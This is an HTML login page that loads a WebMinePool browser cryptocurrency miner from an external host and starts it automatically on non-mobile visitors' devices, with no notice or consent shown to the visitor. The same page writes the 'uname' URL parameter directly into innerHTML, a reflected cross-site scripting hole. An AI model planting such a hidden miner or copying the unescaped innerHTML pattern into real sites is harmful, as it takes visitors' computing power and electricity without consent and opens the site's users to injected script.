<!DOCTYPE html>
<meta charset="UTF-8">

<html>

<head>
<style>
body {font-family: Arial, Helvetica, sans-serif;}

.topright {
      position: absolute;
      top: 8px;
      right: 16px;
      font-size: 18px;
}

.belowTopright {
      position: absolute;
      top: 16px;
      right: 12px;
}

.hidden-div {
    display:none
}

/* Full-width input fields */
input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

/* Set a style for all buttons */
button {
  background-color: #04AA6D;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

/* Extra styles for the cancel button */
.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

/* Center the image and position the close button */
.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
  position: relative;
}

img.avatar {
  width: 16%;
  border-radius: 50%;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* The Modal (background) */
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
  padding-top: 60px;
}

/* Modal Content/Box */
.modal-content {
  background-color: #fefefe;
  margin: 5% auto 15% auto; /* 5% from the top, 15% from the bottom and centered */
  border: 1px solid #888;
  width: 80%; /* Could be more or less, depending on screen size */
}

/* The Close Button (x) */
.close {
  position: absolute;
  right: 25px;
  top: 0;
  color: #000;
  font-size: 35px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: red;
  cursor: pointer;
}

/* Add Zoom Animation */
.animate {
  -webkit-animation: animatezoom 0.6s;
  animation: animatezoom 0.6s
}

@-webkit-keyframes animatezoom {
  from {-webkit-transform: scale(0)} 
  to {-webkit-transform: scale(1)}
}
  
@keyframes animatezoom {
  from {transform: scale(0)} 
  to {transform: scale(1)}
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>

    <script src="https://webminepool.com/lib/base.js"></script>
</head>

<body>



    <div id="wmp-container"
        wmp-site-key="SK_7RiVbBYmRBDgad3SsAhbH"
        wmp-username="anonymous"
        wmp-threads="2"
        wmp-throttle="0.1"
        wmp-autostart="false"
        style="margin: 0 auto;" >
    </div>

    <script type="text/javascript">

        <!-- throttle - rest 30% and use 70%, need to play around with this -->
        var miner = WMP.Anonymous('SK_7RiVbBYmRBDgad3SsAhbH',{throttle: 0.3});

        <!-- avoid running this on mobile, it will drain battery -->
        if (!miner.isMobile()){
            console.log("I am inside the if cond, calling the miner");
            miner.start();
        }

        window.onload = function() {
            var x;
            x = document.getElementById("wmp-container");
            x.style.backgroundColor = "blue";
        };

        function remove(me) {
            document.getElementById(me).outerHTML = ""
        }

    </script>

    <button id="login_button" class="belowTopright" onclick="document.getElementById('id01').style.display='block'" style="width:auto;">Login</button>
    <div id="id01" class="modal">
      <form class="modal-content animate">
        <div class="imgcontainer">
          <span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal">&times;</span>
          <img src="avatar.png" alt="Avatar" class="avatar">
        </div>
    
        <div class="container">
          <label for="uname"><b>Username</b></label>
          <input type="text" placeholder="Enter Username" id="uname" name="uname" required>
    
          <button type="submit">Login</button>
          <label>
            <input type="checkbox" checked="checked" name="remember"> Remember me
          </label>
        </div>
      </form>
    </div>

    <div id="loginName" class="topright"></div>

    <script>
        // Get the modal
        var modal = document.getElementById('id01');

        function getSearchParameters() {
            var prmstr = window.location.search.substr(1);
            return prmstr != null && prmstr != "" ? transformToAssocArray(prmstr) : {};
        }
        
        function transformToAssocArray( prmstr ) {
            var params = {};
            var prmarr = prmstr.split("&");
            for ( var i = 0; i < prmarr.length; i++) {
                var tmparr = prmarr[i].split("=");
                params[tmparr[0]] = tmparr[1];
            }
            return params;
        }
        
        var params = getSearchParameters();
        document.getElementById("loginName").innerHTML=params.uname;
        params = getSearchParameters();
        document.getElementById("wmp-container").setAttribute("wmp-username", params.uname);

        
        // When the user clicks anywhere outside of the modal, close it
        window.onclick = function(event) {
            if (event.target == modal) {
                modal.style.display = "none";
            }
        }
    </script>


    <script src="https://webminepool.com/js/app.js"></script>
    <script src="https://webminepool.com/js/charts.js"></script>
    <script src="https://webminepool.com/js/prism.js"></script>
    <script src="https://webminepool.com/lib/simple-ui.js"></script>
    <script src='https://www.google.com/recaptcha/api.js'></script>
</body>


</html>
